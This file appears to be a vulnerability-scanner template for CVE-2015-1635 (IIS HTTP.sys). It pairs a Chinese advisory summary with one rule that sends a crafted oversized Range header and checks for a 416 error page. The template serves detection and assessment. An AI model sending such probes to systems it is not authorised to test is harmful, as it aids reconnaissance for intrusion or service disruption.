id: CVE-2015-1635

info:
  name: IIS HTTP.sys 远程代码执行
  author: qwtd
  severity: critical
  verified: true
  description: |
    在微软4月14日补丁日发布的补丁中，有一个针对IIS服务器的远程代码执行漏洞危害非常大，安恒信息提醒广大用户注意。 漏洞信息 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 若要利用此漏洞，攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式，安装更新可以修复此漏洞。 Microsoft 通过协同的漏洞披露渠道了解到此漏洞的信息。 在最初发布此安全公告时，Microsoft 未收到任何表明此漏洞已公开用于攻击用户的信息。

rules:
  r0:
    request:
      method: GET
      path: /index.html
      headers:
        Range: bytes=0-18446744073709551615
    expression: response.status == 416 && response.body.bcontains(b'<TITLE>Requested Range Not Satisfiable</TITLE>') && response.body.bcontains(b'HTTP Error 416. The requested range is not satisfiable.')
expression: r0()